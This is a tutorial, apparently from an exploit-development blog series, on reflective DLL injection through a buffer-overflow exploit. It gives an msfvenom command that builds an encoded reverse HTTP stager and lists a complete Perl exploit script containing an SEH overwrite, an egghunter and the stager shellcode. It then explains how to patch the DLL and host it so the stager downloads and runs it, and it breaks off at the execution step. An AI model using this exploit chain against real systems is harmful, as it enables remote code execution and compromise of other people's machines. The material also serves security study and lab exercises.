Introduction
Reflective DLL injection is being used to inject a DLL into a process without reading it from the storage. A stager is executed from the exploited buffer, which in turn retrieves the DLL from a server. The DLL is directly loaded and mapped into the process address space and execution is being handed over to the DLL’s entry point.
To understand the evolution of memory DLL injection, I recommend to read the following 2 papers in the given order:
- Remote Library Injection by skape
- Reflective DLL Injection by Stephen Fewer
Setup
We’ll use the exploit from the previous egg hunting tutorial.
Implementation
Stager
Metasploit offers different stagers to perform the retrieval and injection of a DLL. The reverse HTTP stager will be used in this tutorial.
Generate the payload as follows:
msfvenom -p windows/dllinject/reverse_http lhost=192.168.29.1 lport=80 dll=. -e x86/shikata_ga_nai -b '\x00\x1a' -f perl
Insert the generated shellcode into the exploit script:
my $file = "attack_test.txt";
my $overflow = "0123456789ABCDEF";
my $eip = "AAAA";
my $fill = "B" x 52;
my $nextseh = "\xeb\x06\x90\x90";
my $seh = pack('V',0x123418D4);
my $padding = "\x90" x 0x29;
my $egghunter =
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"w00t".
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
my $reverse_http_stager =
"\xb8\xc9\xb5\x30\xb9\xdb\xd6\xd9\x74\x24\xf4\x5d\x29\xc9" .
"\xb1\x5e\x31\x45\x15\x03\x45\x15\x83\xc5\x04\xe2\x3c\x49" .
"\xd8\x3b\xbe\xb2\x19\x5c\x37\x57\x28\x5c\x23\x13\x1b\x6c" .
"\x20\x71\x90\x07\x64\x62\x23\x65\xa0\x85\x84\xc0\x96\xa8" .
"\x15\x78\xea\xab\x95\x83\x3e\x0c\xa7\x4b\x33\x4d\xe0\xb6" .
"\xb9\x1f\xb9\xbd\x6f\xb0\xce\x88\xb3\x3b\x9c\x1d\xb3\xd8" .
"\x55\x1f\x92\x4e\xed\x46\x34\x70\x22\xf3\x7d\x6a\x27\x3e" .
"\x34\x01\x93\xb4\xc7\xc3\xed\x35\x6b\x2a\xc2\xc7\x72\x6a" .
"\xe5\x37\x01\x82\x15\xc5\x11\x51\x67\x11\x94\x42\xcf\xd2" .
"\x0e\xaf\xf1\x37\xc8\x24\xfd\xfc\x9f\x63\xe2\x03\x4c\x18" .
"\x1e\x8f\x73\xcf\x96\xcb\x57\xcb\xf3\x88\xf6\x4a\x5e\x7e" .
"\x07\x8c\x01\xdf\xad\xc6\xac\x34\xdc\x84\xb8\xa4\xbb\x42" .
"\x39\x51\x34\xc2\x57\xc8\xee\x7c\xe4\x7d\x28\x7a\x0b\x54" .
"\x05\x5f\xa0\x04\x36\x0c\x14\xc3\x82\xe4\xe3\xb4\x0d\xdd" .
"\x47\xe8\x9b\xdd\x34\x5d\x31\xb2\x52\xc5\xc5\x32\xa3\x29" .
"\x9c\x55\xc4\x04\x57\xe9\x7a\x1e\x12\x69\x30\xaa\x83\x28" .
"\xac\x12\x0b\x9d\x5b\x39\x5c\x70\xce\xff\xc7\x17\x9f\xcf" .
"\x40\x94\x0a\x72\x1f\x67\xf0\x1d\xf2\x32\xa2\x8e\x60\xdb" .
"\x0a\x08\x01\x65\x9b\xd8\xc8\x5e\xad\x1c\x7a\xc9\x06\x94" .
"\xe5\xcf\x56\x73\x90\x16\xfb\x14\xa2\x94\x9c\x60\xf1\xcb" .
"\x0f\x3e\xa6\xbd\xc7\x2b\x1d\x6c\x23\x53\x48\xe6\x39\xa1" .
"\x2d\x54\xed\xe6\x82\x0c\x79\x24\x22\xa9\x02\xc9\xff\x4c" .
"\x34\x40\xf7\x01\xc0\x46\xef\xd7\x2a\x99\xef\x8d\x6a\xf1" .
"\xef\x41\x6b\x01\x87\x61\x6b\x41\x57\x31\x03\x19\xf3\xe6" .
"\x36\x66\x2e\x9b\xea\xca\x59\x7b\x5b\x85\x59\xa4\x64\x55" .
"\x0a\xf2\x0c\x47\x3a\x73\x2e\x98\x97\x01\x6f\x13\xd8\x81" .
"\x77\xdd\x25\x10\xb7\xa8\x4c\x43\xfb\x0c\x66\xff\x04\x4d" .
"\x89\x31\xc2\x80\x5b\x03\x02\xdd\x8d\x51\x53\x33\xe0\x95" .
"\x18\xbb\xb7\x34\x08\x56\xb7\x6b\x4a\x73";
open($FILE,">$file");
print $FILE $overflow.$eip.$fill.$nextseh.$seh.$egghunter.$padding."w00tw00t".$reverse_http_stager;
close($FILE);
print "File created\n";
Compile Reflective DLL
Get Steven Fewer’s ReflectiveDLLInjection code repository. Add your code and compile it.
Patch Reflective DLL
Normally Metasploit takes care of adding a small bootstrapper into the reflective DLL header prior delivering it. But in the scenario of a self hosted reflective DLL via a web server, it is necessary to patch it manually.
For this purpose use Borja Merino’s Python script: https://github.com/BorjaMerino/reflectPatcher.py/blob/master/reflectPatcher.py
The script places 4 bytes with size information in front of the actual header. These 4 bytes are not needed in the case of using a HTTP stager, so it is necessary to remove them with a hex editor.
Hosting Reflective DLL
The stager uses a GET HTTP request that is composed of a random string. Depending on the web server in use, it may be required to map the request string to the actual DLL file either by using aliases, URL manipulation or by other means.
Exploit execution
Run the exploit and watch the DLL injection in action:
